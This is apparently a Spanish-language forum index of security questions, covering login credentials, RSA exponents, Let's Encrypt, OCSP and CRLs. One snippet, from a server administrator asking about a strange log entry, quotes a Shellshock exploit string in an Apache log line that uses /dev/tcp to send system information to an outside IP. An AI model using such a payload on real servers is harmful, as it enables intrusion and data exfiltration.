Todas las preguntas

3
respuestas

¿Es posible obtener las credenciales de inicio de sesión enviadas por los usuarios?

Es una pregunta en el libro de texto de seguridad informática Suponga que el usuario A está a punto de usar algún sitio web que requiere credenciales de inicio de sesión. El usuario A inicia su navegador web, escribe la URL del sitio web y en...
pregunta 02.05.2015 - 12:43
1
respuesta

Línea de registro de Apache extraño [duplicado]

Acabo de encontrar esta entrada en uno de mis servidores: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
pregunta 17.06.2015 - 05:56
1
respuesta

OBKG en tarjeta inteligente con PKCS # 11

Tengo una nueva tarjeta inteligente con un módulo PKCS # 11 a bordo y opero en un entorno Win 8. Al igual que muchas tarjetas, puede generar sus propios pares de claves para mayor seguridad (solo la clave pública puede abandonar la tarjeta). Las...
pregunta 27.04.2015 - 00:32
1
respuesta

¿Por qué la información obtenida de los registros públicos se considera una forma segura de confirmar su identidad?

Varias instituciones financieras, agencias gubernamentales, etc., utilizan la información de los registros públicos para confirmar las identidades de las personas, como se menciona en UPS mi elección - ¿Cómo puedo acceder a mis registros públic...
pregunta 27.05.2015 - 19:42
1
respuesta

¿Elige sus propios exponentes en RSA?

En otra publicación interesante , uno de los desarrolladores / investigadores de seguridad detrás de < a href="http://nosuchlabs.com"> Phuctor sugiere que el uso de diferentes exponentes con claves RSA "[aumentará] los costos de atacar su conf...
pregunta 21.05.2015 - 17:23
1
respuesta

¿Let's Encrypt permitirá un flujo de trabajo personalizado? [cerrado]

   El software de administración Let's Encrypt:       Demuestre automáticamente a la entidad de certificación de Let's Encrypt que usted controla el sitio web    Obtenga un certificado de confianza del navegador y configúrelo en su servidor w...
pregunta 11.06.2015 - 11:19
1
respuesta

Forzar https sin 301

Para el .htaccess de mi sitio web actualmente tengo: RewriteCond %{HTTPS} !=on RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] De modo que cuando alguien visita la página a través de http obtiene un 301 y luego se conecta a...
pregunta 10.06.2015 - 12:47
1
respuesta

RemoveFromCRL y DeltaCRL

Tengo una pregunta sobre DeltaCRL con una entrada que contiene RemoveFromCRL reason. Al principio, PKI ha revocado el certificado con certificateHold reason. Y crea la siguiente CRL: Last Update: May 28 13:14:09 2015 GMT Nex...
pregunta 30.05.2015 - 22:29
1
respuesta

mailto correo electrónico encabezados IP de rastreo

Así que estoy trabajando en un caso de difamación. Así que voy a hacer un pequeño resumen de lo que está pasando. La persona que estamos tratando de rastrear está usando un sitio como kijiji. Mañana me dirijo a la oficina central de kijiji. Me h...
pregunta 20.10.2015 - 13:56
1
respuesta

Servidores de respuesta de OCSP y bloqueo de sitios maliciosos

Así que he estado buscando una respuesta a esta, pero nadie parecía haber preguntado esto antes. Por lo que yo entiendo, cuando se conecta a un sitio web. El navegador envía una consulta a un servidor OCSP para verificar la validez actual de su...
pregunta 07.11.2015 - 13:52